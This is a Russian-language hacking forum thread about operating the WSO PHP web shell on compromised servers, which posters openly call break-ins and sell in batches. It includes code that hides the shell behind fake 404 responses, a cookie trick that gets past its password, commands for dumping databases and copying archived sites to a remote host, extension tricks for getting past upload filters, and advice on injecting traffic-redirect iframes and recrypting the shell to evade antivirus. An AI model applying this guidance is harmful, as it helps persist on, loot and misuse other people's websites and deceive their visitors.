Просмотр полной версии : WSO (веб-шелл)
winstrool
17.06.2011, 10:33
не могу понять твоей мысли:
плюс чтоб потом не мучиться переправкой кода, можно добавить функцию обновления шелла с какого нить источника...
slva2000
17.06.2011, 10:55
условие такое: шелл править нет возможности.
ты не о том...
разобрал уже:
постом отправлям сперва (шеллу):
pass=password
потом:
a=php&p1=echo(11);
в рузультате echo(11); выполняется на стороне сервера.
думаю, это будет полезно прикрутить к ману шелла.
Что тебе мешает написать небольшой скрипт, который будет логиниться в шелл и eval'ить твой код на стороне сервера?
UPD: да что там даже логиниться - алгоритм генерации кукисов-то известен, пароль к шеллу ты сам задаешь.
Присутствует ли возможность редактирования базы данных?
COOLBOY007
27.07.2011, 17:28
Да. Можно выполнить любой запрос к БД.
MySQL, PgSQL.
Ещё было бы не плохо сделать при создании архива,указывать путь где сохранить.
А то я например залил шелл,а заархивировать ничего не получается потому что в var/www/ каталоге права "Только чтение".
А так бы можно было создать архив в каталоге var/tmp/
Насколько надежна филтрация поисковиков? Имеются в виду не только яндекс и гугл, но и совсем малоизвестные иностранные.
Насколько надежна филтрация поисковиков? Имеются в виду не только яндекс и гугл, но и совсем малоизвестные иностранные.
Относительно ненадежна.
"Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"
Однако можешь зделать требование, когда будет открываться шелл, а при обычном GET он выдадет 404.
Относительно ненадежна.
"Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"
Однако можешь зделать требование, когда будет открываться шелл, а при обычном GET он выдадет 404.
Если б еще написали как это сделать, было бы замечательно!
Думаю многим бы пригодилась бы, данная модификация..
COOLBOY007
28.07.2011, 15:11
Если б еще написали как это сделать, было бы замечательно!
Думаю многим бы пригодилась бы, данная модификация..
404 Not Found
Not Found
The requested URL was not found on this se rver.
";
}
?>
Далее чтоб открыть шелл открывай по адресу /shell.php?key=antichat
404 Not Found
Not Found
The requested URL was not found on this se rver.
";
}
?>
Далее чтоб открыть шелл открывай по адресу /shell.php?key=antichat
О боже... Такое чудо ни от поисковиков не спасёт, а только админов привлечёт.
Нужен код 404 в HTTP заголовках, если его нет, шелл проиндексируют в е зависимости от контента. А GET вызовет лишнее палево в логах.
Лучше использовать что то подобное:
//В начало кода
if(!isset($_COOKIE['ts'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
miracles
29.07.2011, 05:49
У меня одного доступ по паролю не работает? Ввожу пароль - ничего не происходит.
У меня одного доступ по паролю не работает? Ввожу пароль - ничего не происходит.
Значить пароль не верный.
SergioBlog
29.07.2011, 19:13
miracles, а ты пароль в мд5 вписывал?
Значить пароль не верный.
Нет. у меня тоже самое никакой реакции... тоже самое как буд то конекта нету что ли
Нет. у меня тоже самое никакой реакции... тоже самое как буд то конекта нету что ли
значит папка для сессий недоступна для записи. Попробуй убрать пасс и проверить это.
значит папка для сессий недоступна для записи. Попробуй убрать пасс и проверить это.
Особенно если учесть что WSO не использует сессии
Особенно если учесть что WSO не использует сессии
да ну? Сейчас глянул версию 2 и 2.1 - использует. Может в новых версиях переписали код для работы без сессий?
P.S. Ага, переписали в 2.5.
что из софта актуально под брут пароля?
не подскажите в чем проблема -
меняешь права на файл или папку, права не ставятся
выставляются какие-то левые и потом пытаешься изменить и не получается...
winstrool
13.08.2011, 16:58
не подскажите в чем проблема -
меняешь права на файл или папку, права не ставятся
выставляются какие-то левые и потом пытаешься изменить и не получается...
1. Значит не хватает прав для правки файлов
2. Твой шел принадлежит не той групе к которой принадлежит файл
3. файлы должны правиться в папке с правами 777 естествено одной группы с шелом
что из софта актуально под брут пароля?
Ты про брут шела?, тот же AESBrut
как сделать чтоб шелл норм держал араский язык?...оч надо а допетрить не могу
Винда и браузер под локализацию эту сделаны,а в шеле все равно не отображает норм язык а сплошные кракозябры(
Винда и браузер под локализацию эту сделаны,а в шеле все равно не отображает норм язык а сплошные кракозябры(
в браузере выстави кодировку.
не помогает...яж написал что и браузер и винда настроена под локализацию арабскую
Смотри в какой кодировке имена файлов, м.б. они в юникоде, да и арабские кодировки разные есть.
не помогает...яж написал что и браузер и винда настроена под локализацию арабскую
Настроены, но наверное, не выбраны. Ты точно выбираешь в настройках браузера ее?
вид->кодировка->арабская или юникод (смотришь соурс морды сайта или заголовки смотришь какая конкретно кодировка используется и выбираешь ее).
Нужно сохранить полностью все папки сайта.
Пробую зиповать - ничего не происходит.
На сервере включено gzip, zip и т.д.
В чём дело, как исправить?
Нужно сохранить полностью все папки сайта.
Пробую зиповать - ничего не происходит.
На сервере включено gzip, zip и т.д.
В чём дело, как исправить?
Смотри, есть ли на папке права на запись.
Да, всё есть
Тогда будет легче и эффективнее воспользоваться консолью
у всех или тока у меня проблема с отображение русского языка? везде стоит windows-1251 как и в браузере так и на шелле)
DeepBlue7
22.08.2011, 02:49
Отличный шелл, андетектед, да ещё и функционал широкий. Вот только жаль, что с виндой многие функции пахать не предусмотрены... Ещё бы поддержку MSSQL...
вопрос эт какие ж функции не пашут с windows? стоиту меня windows xp поверхостно посмотрел вроде все работает только проблема с отображением русского языка.) шелл действительно отличный. о только что нашеЛ) кажись на windows нельзя скопировать папку или закинуть в зип архив и скопировать папку) вообще нечего немогу с папкой сделать даже скопировать 1 папку в другой каталог)
DeepBlue7
22.08.2011, 20:30
Собственно, я о этом и говорю... PATCH . Конечно, можно через консоль, но сам факт...
на linux и ubunity работает?)
DeepBlue7
22.08.2011, 23:04
на linux и ubunity работает?)
Работает, работает .
Ещё бы поддержку MSSQL...
Жаль что с базой туго...
SergioRezza
23.08.2011, 13:13
не работает архиватор, приходится пользоваться консолью
DeepBlue7
23.08.2011, 13:19
не работает архиватор, приходится пользоваться консолью
Под линей пахает... Под виндой - нет.
Под линей пахает... Под виндой - нет.
типа под виндой вообще архиватор не пашет?
Osstudio
23.08.2011, 15:27
типа под виндой вообще архиватор не пашет?
Всё прекрасно работает, не обращайте внимание на дураков, или на тех, у кого руки из ж*пы растут
Всё прекрасно работает, не обращайте внимание на дураков, или на тех, у кого руки из ж*пы растут
или на тех, кто не понимает о чём пишет, да ?
давно известно что на всо только линуксувую консоль архиватор аля unzip пашет
я наверно дуб, но не понимаю, куда он сохраняет после архивирования файлы? Нажимаю компресс(зип), выбираю имя файла, подтверждаю, а куда он сохраняется, непонятно
C-r-A-c-K
28.09.2011, 08:22
после компрессии надо потом выбрать paste
aydin-ka
01.10.2011, 12:55
Шелл отличный
Но почему я не могу пройти идентификацию?(( Вроде ставлю пароль "3",сохраняю и загружаю на сервер. Загружаю страничку входа, ввожу пароль, а он не вводиться
winstrool
01.10.2011, 13:00
Шелл отличный
Но почему я не могу пройти идентификацию?(( Вроде ставлю пароль "3",сохраняю и загружаю на сервер. Загружаю страничку входа, ввожу пароль, а он не вводиться
а ты в md5() пасс вставил?
aydin-ka
01.10.2011, 13:06
нет а теперь я понял спасибо)
а ты в md5() пасс вставил?
mistermar
30.10.2011, 21:27
Парни подскажите как с помощью WSO из бд сделать ДАмп определенных полей. и мвозможно ли это сделать?
после подключения к бд внизу будет консоль бд, через нее не пробовал?
alextrust
18.11.2011, 23:25
Подскажите как сделать дамп?
выбираю колонку users(280к)
жму Dump и через 2 минуты получаю страницу с ошибкой
потался подключится через FileZilla но ничего не получилось
nemaniak
18.11.2011, 23:36
Подскажите как сделать дамп?
выбираю колонку users(280к)
жму Dump и через 2 минуты получаю страницу с ошибкой
потался подключится через FileZilla но ничего не получилось
попробуй дедовским способом через консоль
mysqldump -uLOGIN -PPORT -hHOST -pPASS DBNAME > dump.txt
если конечно хватит прав
BARAKASH
12.12.2011, 11:38
Error! Can't open file
тут такой еще вопрос. Заливаю шелл, но при обращении к нему вываливается страница с сорцами вперемешку с формами и вылазит сообщение "Error! Can't open file". Понимаю, что вопрос не связан с самим шеллом, а что то с настройками сервера, но может кто то подскажет в чем дело?
тут такой еще вопрос. Заливаю шелл, но при обращении к нему вываливается страница с сорцами вперемешку с формами и вылазит сообщение "Error! Can't open file". Понимаю, что вопрос не связан с самим шеллом, а что то с настройками сервера, но может кто то подскажет в чем дело?
Залей шелл с другим расширением
.php3
.php4
.php5
.phtml
Чего нить да пройдёт...
Ты наверно код оставил без
Romashka_Sky
12.12.2011, 20:57
Возможно, для данной директории стоит запрет на выполнение PHP-скриптов.
[QUOTE="Ereee"]
Ты наверно код оставил без
Человеки добрые, подскажите в чём дело:
На ломе прекрасно открывается данный шел из этой темы ( /showthread.php?p=2952163 ), только не работают Actions.
Но не открывается вообще шел без модификации ( т.е. который располагается по ссылкам ТСа ) пишет про ошибку:
"Parse error: syntax error, unexpected ')', expecting '(' in лом/wso2.php on line 595
Качаю прямо из топика автора, переименовываю, исправляю хеш пароля, заливаю на лом. Больше никаких исправлений не делаю
Человеки добрые, подскажите в чём дело:
На ломе прекрасно открывается данный шел из этой темы ( /showthread.php?p=2952163 ), только не работают Actions.
Но не открывается вообще шел без модификации ( т.е. который располагается по ссылкам ТСа ) пишет про ошибку:
"Parse error: syntax error, unexpected ')', expecting '(' in лом/wso2.php on line 595
Качаю прямо из топика автора, переименовываю, исправляю хеш пароля, заливаю на лом. Больше никаких исправлений не делаю
Либо попробую wso2_pack.php либо r57.php
Проблема давно известная, других вариантов пока я не встречал
spiderbuber
17.01.2012, 20:32
Интересует следующий момент: пакованный шел выглядит так..
настройки
preg_replace("/.*/e"," тут пошел код
....
",".");
А если паковать билдером, то код выглядит так..
$o=" тут пошел код
...
";eval(" код ");
Как паковать шелл первым способом (т.е. чтобы не было eval'a)?
Jopashnik
18.01.2012, 02:01
скажите плз, что такое, залил шелл, нормально, заходить пытаюсь, ни ошибок ничего нет, просто пустая страница, графы для пароля нет, на других сайтах заливал все норм, в чем может быть дело?
возможно .htaccess мешает
Jopashnik
18.01.2012, 16:38
возможно .htaccess мешает
а проверить как то можно? и если нет доступа до папки с .htaccess, то вариков запустить шелл нет?
Alex2103
20.02.2012, 00:08
у меня вообще кодировка не сходится
OS Version: Microsoft Windows [Version 6.1.7601]
Account Settings:
ЏаЁ*㤨⥫м*л© ўл室 Ї® ЁбвҐзҐ*ЁЁ ўаҐ¬Ґ*Ё зҐаҐ§: ЌЁЄ®Ј¤
ЊЁ*Ё¬ «м*л© ба®Є ¤Ґ©бвўЁп Ї а®«п (¤*Ґ©): 0
Њ ЄбЁ¬ «м*л© ба®Є ¤Ґ©бвўЁп Ї а®«п (¤*Ґ©): 42
ЊЁ*Ё¬ «м* п ¤«Ё* Ї а®«п: 0
•а *Ґ*ЁҐ *ҐЇ®ўв®апойЁебп Ї а®«Ґ©: ЌҐв
Ѓ«®ЄЁа®ўЄ Ї®б«Ґ ®иЁЎ®Є ўў®¤ Ї а®«п: ЌЁЄ®Ј¤
„«ЁвҐ«м*®бвм Ў«®ЄЁа®ўЄЁ (¬Ё*гв): 30
‘Ўа®б бзҐвзЁЄ Ў«®ЄЁа®ў®Є зҐаҐ§ (¬Ё*гв): 30
ђ®«м Є®¬ЇмовҐа : ђЂЃЋ—Ђџ ‘’ЂЌ–€џ
Љ®¬ *¤ ўлЇ®«*Ґ* гбЇҐи*®.
User Accounts:
“зҐв*лҐ § ЇЁбЁ Ї®«м§®ў ⥫Ґ© ¤«п \\NOUT_1
-------------------------------------------------------------------------------
Alex Ђ¤¬Ё*Ёбва в®а ѓ®бвм
Љ®¬ *¤ ўлЇ®«*Ґ* гбЇҐи*®.
Посмотрел код шелла , там только одна функция php preg_replace() (поиск и замена).
и в ней все шифрованно, хотелось бы знать как это все работает и в каком формате зашифрованно.
уже много раз обсуждалось
пакер:
https://rdot.org/forum/showpost.php?p=12378&postcount=17
незапакованная версия шелла:
https://rdot.org/forum/showpost.php?p=11829&postcount=1
sasha.seven
04.03.2012, 12:18
Посмотрел код шелла , там только одна функция php preg_replace() (поиск и замена).
и в ней все шифрованно, хотелось бы знать как это все работает и в каком формате зашифрованно.
кто мешает расшифровать ?
WSOmanager - может заливать файлы через список шелов?
залейте ктонить куда без Бекдора
спасибо
если в настройках php disable function отключен disk_free_space, то шелл не закачивает файлы на сервер (при том что есть все права)
не знаю куда напсиать, надеюсь сдесь поможете.
У меня на сайте есть Wso шелл, сайт на Джумле. Нужно на этот сайт вставить php код для слития трафика. Вообщем нужно вставить код в такой файл, который вызывается на всех страницах Сайта. Вот как выглядит папка сайта:
http://screenshotuploader.com/s/01/fkDTIVlBK
в index.php вставляю - не получается.
Вот как выглядит index.php:
http://screenshotuploader.com/s/01/7HPMox3A
Да и вообще, при залитии в главную дирикторю(или даже в любую) и при обращении к файлу: site.ru/file.html например, не отображается, а отображается просто главная страница. Куда и как вписать мой код?
FaceLess
19.04.2012, 10:20
Листая тему понял то, что ничего не понимаю в плане того, где без ошибок, а где с ошибками. И делается ли тут модификачия или каждый хвалится тем, что написал?
Если это общие труды, прошу поделиться кодом.
Ice_Burn
19.04.2012, 13:10
У меня на сайте есть Wso шелл, сайт на Джумле. Нужно на этот сайт вставить php код для слития трафика. Вообщем нужно вставить код в такой файл, который вызывается на всех страницах
Ставь фрейм в индексе на свой файл.
не знаю куда напсиать, надеюсь сдесь поможете.
У меня на сайте есть Wso шелл, сайт на Джумле. Нужно на этот сайт вставить php код для слития трафика. Вообщем нужно....
Открываешь свой сайт через браузер, потом исходный код, смотришь где располагается тема(templates) идешь туда и с ставишь фрейм либо инклуд.
залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?
тебе прав не достаточно.вроде..
BLurpi^_^
29.04.2012, 20:00
залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?
залей туда свой htaccess
driveshiftr
30.04.2012, 08:41
залей туда свой htaccess
...если есть права на заливку в корень, конечно.
MagicProfit
30.04.2012, 09:36
залил шеллы, много серваков, за день захожу - на всех пишет No send, тупо белое окно, без авторизации, и пишет No send.
Что это? как вернуть шеллы если уязвимости на сайте уже нет, а шеллы доступны, но такая вот хрень..?
t3cHn0iD
01.05.2012, 13:00
залил шеллы, много серваков, за день захожу - на всех пишет No send, тупо белое окно, без авторизации, и пишет No send.
Что это? как вернуть шеллы если уязвимости на сайте уже нет, а шеллы доступны, но такая вот хрень..?
Прошерстили логи, закрыли баги, нашли шелл, закрыли тебе доступ.Все Соседние сайты ковыряй.
MagicProfit
01.05.2012, 14:07
Прошерстили логи, закрыли баги, нашли шелл, закрыли тебе доступ.Все
Соседние сайты ковыряй.
на всех серверах? и не потёрли? не возможно такое, тут дело в wso, только не пойму что именно случилось...
Jopashnik
01.05.2012, 21:24
удалили файл, или просто не ту папку смотришь куда заливал, проверь еще сайты сами робят
kactetus
13.07.2012, 02:43
у меня nod палит этот шелл, чем закодировать чтобы не палил?
aydin-ka
13.07.2012, 12:58
Сейчас вообще актуальная версия 2.5? Нет более новых и поддерживаемых шеллов wso?
На каком-то бурж хак форумах видел WSO 2.6. Попросил мне скинуть, так и не скинули. На вид то же самое, что и WSO 2.5
UPD: А вот сам и сайт (http://www.hackforums.net/showthread.php?tid=2336179&highlight=WSO)
aydin-ka
13.07.2012, 21:59
сайт на Forbidden
1) мб надо зарегатся
2) с опр. IP туда не пускают...
На каком-то бурж хак форумах видел WSO 2.6. Попросил мне скинуть, так и не скинули. На вид то же самое, что и WSO 2.5
UPD:
А вот сам и сайт (http://www.hackforums.net/showthread.php?tid=2336179&highlight=WSO)
Последняя версия лежит в привате и видеть ее вы никак не могли. А то, что у них там либо фейк или ихние наработки!
1) мб надо зарегатся
2) с опр. IP туда не пускают...
с каких именно определённых ип туда не пускают?я уже 1 год не могу зайти туда
aydin-ka
14.07.2012, 12:02
Последняя версия лежит в привате и видеть ее вы никак не могли. А то, что у них там либо фейк или ихние наработки!
Я видел на скрине... Адрес по которому лежит шелл выходит якобы ошибка 404. А на самом деле за надписью есть поле ввода пароля...
К сожалению, я не знаю с каких IP. Воспользуйтесь VPN (западные страны)
Последняя версия лежит в привате
Откуда информация ? Кто нибудь ещё может подтвердить её достоверность ? В чём заключается апдейт ?
aydin-ka
15.07.2012, 00:02
Откуда информация ? Кто нибудь ещё может подтвердить её достоверность ? В чём заключается апдейт ?
Про приват не слышал. Есть доработанный шелл группой лиц, которые присвоили ему название WSO 2.6
На то он и приват, что бы вы о нем не слышали, что за глупые вопросы.
На то он и приват, что бы вы о нем не слышали, что за глупые вопросы.
А ну тогда да, есть скрипт ломающий любой GOV или MIL сайт и заливающий шелл в 2 клика, только о нём никому не известно, даже создателям, потому что он приват.
Как то так звучит твоё объяснение....
З.Ы. Сарказм насколько вы поняли =/
mironich
15.07.2012, 02:23
С РУ ip не пускает, лучше всего под US соксами туда.
куда то блять вас всех не пускает? надеюсь и не пустит.
дорогой орб, если майнтейнишь данный скрипт, заделай баг в паблик версии->mysql клиент. Щелл плохо работает с таблицами которые содержат пробелы в имени. Проблема в каунтах.
Некий WSO 2.6 кому сильно надо.
http://pastebin.com/Xneg3zJu
как менять права в папках через шел этот?
Щелл плохо работает с таблицами которые содержат пробелы в имени.
Разве пробелы в именах разрешены?
2.6 нету есть 2.5.1
Какой пароль стоит по умолчанию для входа или, где его ставить?
Для получения пароля, отправь СМС на короткий номер 9535 с текстом, "WSO 2.5" в ответ получишь пароль
Открой исходник, там всё есть
или задай сам, с нужными опциями
http://kronus.me/cn/wso-builder/1.04/
alextrust
23.10.2012, 04:56
root
как его научить работать с suid файлами?
как его научить работать с suid файлами?
Используя вот это (https://antichat.live/threads/287507/)
WSO 2.5 modif - выдает ошибку "Query did not return anything"
что в строке PHP указать? я вроде указываю путь из php.ini - но все равно, если ввести 2 поля верхних то он показывает что есть рут, поле 3 ввожу, и все ошибка.
Думаю что то связано с PHP Интерпретатором, wrapper.php в связке с wso_root.php, перестали работать, можете помочь?)
WSO 2.5 modif - выдает ошибку "Query did not return anything"
что в строке PHP указать? я вроде указываю путь из php.ini - но все равно, если ввести 2 поля верхних то он показывает что есть рут, поле 3 ввожу, и все ошибка.
Думаю что то связано с PHP Интерпретатором, wrapper.php в связке с wso_root.php, перестали работать, можете помочь?)
напиши в личку,может помогу
foxinvisible
25.10.2012, 14:14
А чего нет в 2.5 ? Зачем вообще обновление?
Expl0ited
01.11.2012, 19:07
Не то, что бы это дикий пиздец, но если вдруг, вы забыли пароль к своему шеллу WSO, и у вас есть возможность прочитать исходник, можно увидеть вполне элементарную строчку:
$auth_pass="5deeb7c8589e337d46a3b2f807af33fd";# md5(пароль)
Но к сожалению если ваша память коротка, а cmd5 и подобные сервисы не в силах сбрутить пароль по типу "md5(FmST[3XjPW) = 5deeb7c8589e337d46a3b2f807af33fd", а текстовый документ с исходным паролем чудом не сохранился. Расстраиваться не нужно. Достаточно послать в запросе в заголовке Cookie md5 сумму хоста, и прочитанный хеш.
К примеру, шелл тут: http://google.com/images/wso.php
Возможность прочитать исходник тут: http://google.com/index.php?file=../images/wso.php
Получаем:
$auth_pass="5deeb7c8589e337d46a3b2f807af33fd";# md5(пароль)
Посылаем запрос:
GET /images/wso.php HTTP/1.1
Host: google.com
Cookie: 1d5920f4b44b27a802bd77c4f0536f5a=5deeb7c8589e337d4 6a3b2f807af33fd
Меняем пароль, на тот который в состоянии запомнить, и всё.
Не знаю кому эта информация сможет пригодиться, но пусть полежит здесь.
foxinvisible
01.11.2012, 19:19
У меня сделка через 4 часа..
Человек оплачивает хххх$ с протекцией, потом получает пачку шеллов залитый, потом передаёт код, а потом я передаю пароль. Вот я и думаю теперь насколько вероятно для него будет не дать мне код протекции (человек сомнительный, если честно), а просто попытаться расшифровать хэш =)
Что за фигня? При смене пароля на свой авторизоваться не хочет, ввожу правильно и уже не первый раз так
Что за фигня? При смене пароля на свой авторизоваться не хочет, ввожу правильно и уже не первый раз так
Почистите кукисы.
er"]
po[w]er said:
почистил анологично
было бы неплохо еще и хеш пароля проверить
А че так и не добавили бекконнект с полноценным башем?
https://rdot.org/forum/showthread.php?t=1386
Есть возможность отследить действия через шелл или добавиться код чтоб в отдельный файл логировал все команды ,а то в последнее время частенько берут шеллы на проверку ,а потом мол "неподошел".
Есть возможность отследить действия через шелл или добавиться код чтоб в отдельный файл логировал все команды ,а то в последнее время частенько берут шеллы на проверку ,а потом мол "неподошел".
да можно, кто тебе мешает? на вопрос как? - ответ. нанимай кодеров и всё тебе сделаеют.
если что моешь моим скриптом воспользоватся, как раз для этих целей http://mh-proxy.ru/blog/index.php?mod=read&id=11
как менять права на папки через шел? массово?
как менять права на папки через шел? массово?
Клац (http://g.zeos.in/?q=Man%20chmod)
Клац (http://g.zeos.in/?q=Man%20chmod)
и что клац? не увидел я в гугле как менять права через WSO
и что клац? не увидел я в гугле как менять права через WSO
ну тогда тебе рано права менять учись гуглом пользоватсья )))
В командной строке выполни:
[QUOTE="None"]
echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{%-{
более свежей нет у кого нибудь? можно в личку
WSO 2.6 / 1.4.9 (Stealthers.in edition - Modified by Death Burner / Staf4)
сам не сделаешь, никто не сделает =( всем достаточно того что есть =(
добавил пару функций 1 клик серв нашпигован бекдорами 2ой клик уплоадерами )
чего бы ещё добавить?
никто не сталкивался с такой проблемой как скачка файлов больше 1 гигабайта? думаю конечно что дело все же не в шелле, а в настройках апача и ограничениями. подскажите что сделать в подобной ситуации?
скачивал сайты и 20 гигов через Download Master путь пропиши к архиву и всё site.ru/tmp/file.tar например
если бы это было так, то я бы не задавал подобного вопроса. мне нужны файлы из под серверного каталога, поэтому путь для скачки никак не укажешь
nemaniak
14.04.2013, 20:59
если бы это было так, то я бы не задавал подобного вопроса. мне нужны файлы из под серверного каталога, поэтому путь для скачки никак не укажешь
проблема раздута, есть ftp, sftp, curl в конце концов, к тому же, всегда можно разбить архив на части или банально засимулинкать в папку доступную с веба
Можно ли через консоль сменить тач у выбранных папок?
Если да, то как?
Win2k3SE
06.05.2013, 02:51
Можно ли через консоль сменить тач у выбранных папок?
Если да, то как?
touch folder1 folder2 folder3 -d "2012-01-31 17:59:30"
Дата вставляется в том же формате, в котором она показана в ВСО, обязятельно в кавычках.
Но не на всех системах работает флажок -d, например на FreeBSD он не работает. В этом случае придётся использовать флажок -t
touch folder1 folder2 folder3 -t 201201311759.30
Чтобы преобразовать дату в формат, пригодный для -t, надо убрать между числами пробелы, дефисы и двоеточия, и перед числом седунд поставить точку.
ravencrow
03.08.2013, 15:25
Скачал обновленный wso который со страницей 404 из шапки или из этого сообщения (https://antichat.live/showpost.php/p/3262825/postcount/323/). Но его детектит Avira сразу же, даже не запуская (PHP/Shell.G.2). Как бы сделать чтобы Avira не детектила? Да и вобще антивирусы не видели. А то мало ли на хостинге антивирусы могут быть.
Еще пару неприятных багов обнаружил:
1. Если открывать шелл через анонимайзер, и редактировать css, то все ссылки в background:url();
изменяются на длинную строку типа ./ob2tema.nn2weylofzzhk и после сохранения получаем битый css. Так можно и сайт запороть.
2. Шелл не работает на хостингах которые на Windows.
Выдает такую ошибку:
Warning: Unknown: failed to open stream: Permission denied in Unknown on line 0
Fatal error: Unknown: Failed opening required 'C:/Site/localhost/www/f.php' (include_path='.;C:\php5\pear') in Unknown on line 0
winstrool
03.08.2013, 18:17
Скачал обновленный wso который со страницей 404 из шапки или из этого
сообщения (https://antichat.live/showpost.php/p/3262825/postcount/323/)
. Но его детектит Avira сразу же, даже не запуская (PHP/Shell.G.2). Как бы сделать чтобы Avira не детектила? Да и вобще антивирусы не видели. А то мало ли на хостинге антивирусы могут быть.
Еще пару неприятных багов обнаружил:
1. Если открывать шелл через анонимайзер, и редактировать css, то все ссылки в background:url();
изменяются на длинную строку типа ./ob2tema.nn2weylofzzhk и после сохранения получаем битый css. Так можно и сайт запороть.
2. Шелл не работает на хостингах которые на Windows.
Выдает такую ошибку:
Warning: Unknown: failed to open stream: Permission denied in Unknown on line 0
Fatal error: Unknown: Failed opening required 'C:/Site/localhost/www/f.php' (include_path='.;C:\php5\pear') in Unknown on line 0
Перекриптуй его. базовый код палится АВ.
подскажите плз, где можно найти код шелов WSO 3.0 + WSO 3.1 ?
подскажите плз, где можно найти код шелов WSO 3.0 + WSO 3.1 ?
Оффициально такой версии не выходило.
Чьи-то личные наработки, не более.
saitsdelaem
06.09.2013, 12:04
Перекриптуй его. базовый код палится АВ.
Есть ведь сервис крипта. Там цена от 1$ за один крипт.
Перекриптовал.
Вроде не палится (ну это тока пока , сами знаете)
В коде самого шелла ничего не менял, за основу взял wso2_pack
http://zalil.ru/34751845
Вирустотал
_https://www.virustotal.com/ru/file/3af075b869b3a3726cace5e8e21654acd3b8e1dd9166ace0c3 e8ed4185152c1c/analysis/1380672716/
3/48
ЗЫ - Автор, если не нравится - удалю.
winstrool
03.10.2013, 07:18
Перекриптовал.
Вроде не палится (ну это тока пока
, сами знаете)
В коде самого шелла ничего не менял, за основу взял wso2_pack
http://zalil.ru/34751845
Вирустотал
_https://www.virustotal.com/ru/file/3af075b869b3a3726cace5e8e21654acd3b8e1dd9166ace0c3 e8ed4185152c1c/analysis/1380672716/
3/48
ЗЫ - Автор, если не нравится - удалю.
И чего вы там перекриптовали? первые строчки, давно уже участвуют в различных шелл-сканерах, сам шелл вы всеголишь перенесли в отдельную переменную, да и на заметку такие функции как base64_decode и preg_replace сегодня тоже можно частенько найти в шелл сканерах, и люди которые ручками вычищают, тоже обращают на эти функции внимание.
И чего вы там перекриптовали? первые строчки, давно уже участвуют в различных шелл-сканерах, сам шелл вы всеголишь перенесли в отдельную переменную, да и на заметку такие функции как
base64_decode
и
preg_replace
сегодня тоже можно частенько найти в шелл сканерах, и люди которые ручками вычищают, тоже обращают на эти функции внимание.
Ну дык каждому свое. попросили чтобы АВ не палило. я сделал. А что там дальше - это уже не мое дело.
Эх, ладно. Вот еще 2 рекрипта WSO 2.5
Основа та же - WSO v2.5 Packed
В коде шелла ничего не менял.
Внимание
Версия 2.1 закриптована публичным криптором, так что за отсутствие "добавок" (стучалок и проч.) в коде не ручаюсь. Хотя акула стука не увидела
Надеюсь эти понравятся уважаемому winstrool
wso2.5 recrypted v2.0 (http://zalil.ru/34763541) 64,1 КБ (65734 байт)
_https://www.virustotal.com/ru/file/06e167ffa411142bf45d9b9f07357afd2c35dc31022f88ed67 d470b11a6fcf75/analysis/1381193913/
результат тот же - 3 / 48
wso2.5 recrypted v2.1 (http://zalil.ru/34763550) 86,7 КБ (88800 байт)
_https://www.virustotal.com/ru/file/9a4a084309f51684ca86a1a5fac5a5c0951d5e82a407308ad0 9b69c6dcaca32b/analysis/1381193823/
Результат 1 / 48
BlueMarine
02.11.2013, 03:51
на php 5.4 нету ни у кого?
Думаю наврятли кто-то будет переделывать на 5.4, тем более за free..
Тебе проще самому взять маны по 5.4 и покурить скрипт
а что именно не работает на php 5.4 ?
перезалейте, обменник несколько дней висит
billy boroda
29.11.2013, 00:37
Kamik, перезалей пожалуйста. шо то http://zalil.ru вообще 502
Как мне выполнить поиск определенного файла на сервере? Скажем, хочу я найти php.exe? Или же php.ini...
winstrool
06.12.2013, 07:04
Как мне выполнить поиск определенного файла на сервере? Скажем, хочу я найти php.exe? Или же php.ini...
в консоле набери:
find / -type f -name php.ini
find / -type f -name php.exe
также в самой консоле есть уже небольшой набор команд, можешь в них покопаться и все будет ясно.
Спасибо, php.exe и php.ini не находит, но другие файлы - легко. Это может зависеть от прав? В чем может быть проблема?
Спасибо, php.exe и php.ini не находит, но другие файлы - легко. Это может зависеть от прав? В чем может быть проблема?
Конечно, если нет прав на чтение каталога - то там find искать не будет (если не ошибаюсь, он при поиске сообщает в какие каталоги заглянуть не смог).
Ежели хочешь обыскать ВЕСЬ комп - запускай find под root и будет тебе счастье.
infoseller
20.12.2013, 09:53
Прекрасный шелл! А ни у кого нет версии для работы с MongoDB?
Прекрасный шелл! А ни у кого нет версии для работы с MongoDB?
phpMoAdmin - MongoDB GUI (http://phpmoadmin.com/)
search74
25.12.2013, 13:52
А как, будучи сжав сайт в gz архив перекинуть его на удаленный сервер?
Пробовал так: scp folder.tar.bz2 root@SERVER_IP:/var/www
но так не получается, потому что надо еще пароль как то скормить...
nemaniak
25.12.2013, 14:01
А как, будучи сжав сайт в gz архив перекинуть его на удаленный сервер?
Пробовал так: scp folder.tar.bz2 root@SERVER_IP:/var/www
но так не получается, потому что надо еще пароль как то скормить...
По файл ключу: scp -i file_key folder.tar.bz2 root@SERVER_IP:/var/www
ребята подскажите что не так , залил шел, захожу
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@xxxxxx.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at xxxxxx.com Port 80
xellomix
07.02.2014, 16:10
множество изменений сделал в шелле включая невскрываемое шифрование))
пробуем вскрыть)) мне кажеться почти невозможно)
скрин:
http://clck.ru/954fm
защищёный код:
http://clck.ru/954fq
Приветствую, вопрос по запросу к бд.
Нужно изменить в таблице данные, но не выходит. вот что пишу в консоли, может кто поможет?
UPDATE `таблица в которой нужно внести изменения` SET `раздел в котором находится информация`='что нужно вставить' WHERE (`раздел в котором находится информация`='что заменить')
В чем может быть ошибка? почему же не выполняется запрос
Изменить пытаюсь javascript на javascript.
Заранее благодарен за ответ.
Движок Ip.Board
P.s. так же пробывал заливать adminer , при редактировании вылазят макросы по всему сайту, может это можно как-то исправить?
Права есть?
Да полные права.
Когда этот запрос делаю, сообщений никаких не выходит.
